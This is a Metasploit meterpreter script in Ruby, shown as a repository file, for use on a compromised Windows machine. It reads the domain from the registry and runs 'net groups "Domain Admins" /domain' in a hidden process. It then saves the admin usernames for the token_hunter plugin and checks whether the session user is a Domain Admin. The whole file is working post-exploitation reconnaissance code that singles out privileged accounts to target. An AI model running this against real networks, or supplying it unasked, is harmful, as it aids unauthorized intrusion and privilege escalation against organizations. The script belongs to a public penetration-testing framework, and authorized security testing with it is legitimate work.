metasploit-framework/scripts/meterpreter/domain_list_gen.rb

106 lines
3.3 KiB
Ruby
Raw Normal View History

##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to imporve this script, please try to port it as a post
# module instead. Thank you.
##
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
#Options and Option Parsing
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ]
)
opts.parse(args) { |opt, idx, val|
case opt
when "-h"
print_line "Meterpreter Script for extracting Doamin Admin Account list for use."
print_line "in token_hunter plugin and verifies if current account for session is"
print_line "is a member of such group."
print_line(opts.usage)
raise Rex::Script::Completed
end
}
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
#-------------------------------------------------------------------------------
#Set General Variables used in the script
@client = client
users = ""
list = []
host = @client.sys.config.sysinfo['Computer']
current_user = @client.sys.config.getuid.scan(/\S*\\(.*)/)
def reg_getvaldata(key,valname)
value = nil
begin
root_key, base_key = @client.sys.registry.splitkey(key)
open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
v = open_key.query_value(valname)
value = v.data
open_key.close
end
return value
end
domain = reg_getvaldata("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon","DefaultDomainName")
if domain == ""
print_error("domain not found")
end
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
unsupported if client.platform != 'windows'
# Create a directory for the logs
logs = ::File.join(Msf::Config.log_directory, 'scripts','domain_admins')
# Create the log directory
::FileUtils.mkdir_p(logs)
#logfile name
dest = Rex::FileUtils.clean_path(logs + "/" + host + filenameinfo + ".txt")
print_status("found users will be saved to #{dest}")
################## MAIN ##################
#Run net command to enumerate users and verify that it ran successfully
cmd = 'net groups "Domain Admins" /domain'
r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
users << d
if d=~/System error/
print_error("Could not enumerate Domain Admins!")
raise Rex::Script::Completed
end
break if d == ""
end
#split output in to lines
out_lines = users.split("\n")
#Select only those lines that have the usernames
a_size = (out_lines.length - 8)
domadmins = out_lines.slice(6,a_size)
#get only the usernames out of those lines
domainadmin_user_list = []
domadmins.each do |d|
d.split(" ").compact.each do |s|
domainadmin_user_list << s.strip if s.strip != "" and not s =~ /----/
end
end
#process accounts found
print_status("Accounts Found:")
domainadmin_user_list.each do |u|
print_status("\t#{domain}\\#{u}")
file_local_write(dest, "#{domain}\\#{u}")
list << u.downcase
end
if list.index(current_user.join.chomp.downcase)
print_status("Current sessions running as #{domain}\\#{current_user.join.chomp} is a Domain Admin!!")
else
print_error("Current session running as #{domain}\\#{current_user.join.chomp} is not running as Domain Admin")
end